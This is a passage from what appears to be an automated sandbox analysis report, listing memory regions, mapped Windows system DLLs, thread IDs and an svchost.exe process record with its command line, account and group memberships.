= "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4343 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4344 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 4345 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 4346 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 4347 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 4348 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 4349 start_va = 0x45d0000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045d0000" filename = "" Region: id = 4350 start_va = 0x45d0000 end_va = 0x45f9fff monitored = 0 entry_point = 0x45d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4351 start_va = 0x46f0000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 4352 start_va = 0x4700000 end_va = 0x4887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004700000" filename = "" Region: id = 4353 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4354 start_va = 0x4890000 end_va = 0x4a10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004890000" filename = "" Region: id = 4355 start_va = 0x4a20000 end_va = 0x5e1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a20000" filename = "" Region: id = 4356 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4357 start_va = 0x41b0000 end_va = 0x41b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041b0000" filename = "" Region: id = 4358 start_va = 0x41c0000 end_va = 0x41c4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 4359 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 4360 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 4361 start_va = 0x5e20000 end_va = 0x6156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4362 start_va = 0x45d0000 end_va = 0x46b9fff monitored = 0 entry_point = 0x460d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4363 start_va = 0x4400000 end_va = 0x4403fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 4364 start_va = 0x4410000 end_va = 0x450ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 4365 start_va = 0x45d0000 end_va = 0x46affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 4366 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4367 start_va = 0x46b0000 end_va = 0x46b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046b0000" filename = "" Region: id = 4368 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 4369 start_va = 0x46c0000 end_va = 0x46c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046c0000" filename = "" Region: id = 4370 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 4371 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 4372 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4373 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 4374 start_va = 0x6160000 end_va = 0x619ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006160000" filename = "" Region: id = 4375 start_va = 0x61a0000 end_va = 0x61dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061a0000" filename = "" Region: id = 4376 start_va = 0x61e0000 end_va = 0x621ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061e0000" filename = "" Region: id = 4377 start_va = 0x6220000 end_va = 0x625ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006220000" filename = "" Region: id = 4378 start_va = 0x6260000 end_va = 0x629ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006260000" filename = "" Region: id = 4379 start_va = 0x62a0000 end_va = 0x62dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062a0000" filename = "" Region: id = 4380 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 4381 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 4383 start_va = 0x46d0000 end_va = 0x46d5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046d0000" filename = "" Thread: id = 320 os_tid = 0xfd0 Thread: id = 321 os_tid = 0x670 Thread: id = 322 os_tid = 0xf44 Thread: id = 323 os_tid = 0xc78 Thread: id = 324 os_tid = 0xf54 Process: id = "58" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x75321000" os_pid = "0x378" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c224" [0xc000000f], "LOCAL" [0x7] Region: id = 4171 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4172 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4173 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4174 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4175 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 4176 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 4177 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 4178 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4179 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 4180 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4181 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 4182 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 4183 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4184 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4185 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 4186 start_va = 0x540000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 4187 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 4188 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 4189 start_va = 0x5a0000 end_va = 0x5a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 4190 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 4191 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4192 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 4193 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 4194 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 4195 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 4196 start_va = 0x700000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 4197 start_va = 0x800000 end_va = 0x800fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 4198 start_va = 0x860000 end_va = 0x866fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 4199 start_va = 0x870000 end_va = 0x8d3fff monitored = 0 entry_point = 0x885ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 4200 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 4201 start_va = 0xa00000 end_va = 0xb87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 4202 start_va = 0xb90000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 4203 start_va = 0xd20000 end_va = 0x111afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d20000" filename = "" Region: id = 4204 start_va = 0x1120000 end_va = 0x119ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 4205 start_va = 0x11a0000 end_va = 0x121ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 4206 start_va = 0x12b0000 end_va = 0x12b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 4207 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 4208 start_va = 0x1400000 end_va = 0x147ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 4209 start_va = 0x1480000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 4210 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 4211 start_va = 0x16d0000 end_va = 0x16d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016d0000" filename = "" Region: id = 4212 start_va = 0x1700000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 4213 start_va = 0x1800000 end_va = 0x187ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 4214 start_va = 0x1880000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001880000" filename = "" Region: id = 4215 start_va = 0x1900000 end_va = 0x197ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 4216 start_va = 0x1980000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001980000" filename = "" Region: id = 4217 start_va = 0x1a00000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 4218 start_va = 0x1b90000 end_va = 0x1c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b90000" filename = "" Region: id = 4219 start_va = 0x1d00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 4220 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 4221 start_va = 0x2000000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 4222 start_va = 0x2100000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 4223 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 4224 start_va = 0x2300000 end_va = 0x2636fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4225 start_va = 0x2640000 end_va = 0x273ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 4226 start_va = 0x2740000 end_va = 0x281ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4227 start_va = 0x2820000 end_va = 0x291ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 4228 start_va = 0x2920000 end_va = 0x2a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002920000" filename = "" Region: id = 4229 start_va = 0x2a20000 end_va = 0x2b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a20000" filename = "" Region: id = 4230 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 4231 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 4232 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 4233 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 4234 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 4235 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 4236 start_va = 0x3200000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 4237 start_va = 0x3400000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 4238 start_va = 0x3600000 end_va = 0x36fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 4239 start_va = 0x3700000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 4240 start_va = 0x3800000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 4241 start_va = 0x3900000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 4242 start_va = 0x3a00000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 4243 start_va = 0x3b00000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 4244 start_va = 0x3c00000 end_va = 0x3cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 4245 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4246 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 4247 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 4248 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 4249 start_va = 0x7ff6a3140000 end_va = 0x7ff6a314cfff monitored = 0 entry_point = 0x7ff6a3143980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 4250 start_va = 0x7ff865360000 end_va = 0x7ff865392fff monitored = 0 entry_point = 0x7ff86536ae20 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 4251 start_va = 0x7ff866b90000 end_va = 0x7ff866d47fff monitored = 0 entry_point = 0x7ff866b95550 region_type = mapped_file name = "wmalfxgfxdsp.dll" filename = "\\Windows\\System32\\WMALFXGFXDSP.dll" (normalized: "c:\\windows\\system32\\wmalfxgfxdsp.dll") Region: id = 4252 start_va = 0x7ff867de0000 end_va = 0x7ff867e67fff monitored = 0 entry_point = 0x7ff867df4510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 4253 start_va = 0x7ff86e970000 end_va = 0x7ff86e983fff monitored = 0 entry_point = 0x7ff86e971800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 4254 start_va = 0x7ff86e990000 end_va = 0x7ff86ea85fff monitored = 0 entry_point = 0x7ff86e9c9590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 4255 start_va = 0x7ff86efa0000 end_va = 0x7ff86efb0fff monitored = 0 entry_point = 0x7ff86efa2fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 4256 start_va = 0x7ff870c70000 end_va = 0x7ff870ceefff monitored = 0 entry_point = 0x7ff870c87110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 4257 start_va = 0x7ff874560000 end_va = 0x7ff87458afff monitored = 0 entry_point = 0x7ff87456c3c0 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 4258 start_va = 0x7ff874590000 end_va = 0x7ff87469cfff monitored = 0 entry_point = 0x7ff8745bf420 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 4259 start_va = 0x7ff8750d0000 end_va = 0x7ff8750dafff monitored = 0 entry_point = 0x7ff8750d1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4260 start_va = 0x7ff8750e0000 end_va = 0x7ff875127fff monitored = 0 entry_point = 0x7ff8750ea1e0 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 4261 start_va = 0x7ff875250000 end_va = 0x7ff875269fff monitored = 0 entry_point = 0x7ff875252430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4262 start_va = 0x7ff875270000 end_va = 0x7ff875285fff monitored = 0 entry_point = 0x7ff8752719f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4263 start_va = 0x7ff8752d0000 end_va = 0x7ff8752ddfff monitored = 0 entry_point = 0x7ff8752d2e50 region_type = mapped_file name = "cmintegrator.dll" filename = "\\Windows\\System32\\cmintegrator.dll" (normalized: "c:\\windows\\system32\\cmintegrator.dll") Region: id = 4264 start_va = 0x7ff8752e0000 end_va = 0x7ff875317fff monitored = 0 entry_point = 0x7ff8752e68f0 region_type = mapped_file name = "wcmcsp.dll" filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: "c:\\windows\\system32\\wcmcsp.dll") Region: id = 4265 start_va = 0x7ff875480000 end_va = 0x7ff8754b7fff monitored = 0 entry_point = 0x7ff875498cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4266 start_va = 0x7ff8754c0000 end_va = 0x7ff875558fff monitored = 0 entry_point = 0x7ff8754da090 region_type = mapped_file name = "wcmsvc.dll" filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll") Region: id = 4267 start_va = 0x7ff875ae0000 end_va = 0x7ff875b3cfff monitored = 0 entry_point = 0x7ff875af2bf0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 4268 start_va = 0x7ff875b50000 end_va = 0x7ff875c5afff monitored = 0 entry_point = 0x7ff875b92610 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 4269 start_va = 0x7ff875d20000 end_va = 0x7ff875d30fff monitored = 0 entry_point = 0x7ff875d23320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 4270 start_va = 0x7ff876870000 end_va = 0x7ff8769a5fff monitored = 0 entry_point = 0x7ff87689f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 4271 start_va = 0x7ff878090000 end_va = 0x7ff8780fffff monitored = 0 entry_point = 0x7ff8780b2960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 4272 start_va = 0x7ff8786b0000 end_va = 0x7ff8786c7fff monitored = 0 entry_point = 0x7ff8786b5910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 4273 start_va = 0x7ff878960000 end_va = 0x7ff878b10fff monitored = 0 entry_point = 0x7ff8789b3690 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 4274 start_va = 0x7ff878b20000 end_va = 0x7ff878be7fff monitored = 0 entry_point = 0x7ff878b613f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4275 start_va = 0x7ff878df0000 end_va = 0x7ff878e39fff monitored = 0 entry_point = 0x7ff878dfac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 4276 start_va = 0x7ff8798b0000 end_va = 0x7ff8798b8fff monitored = 0 entry_point = 0x7ff8798b19a0 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") 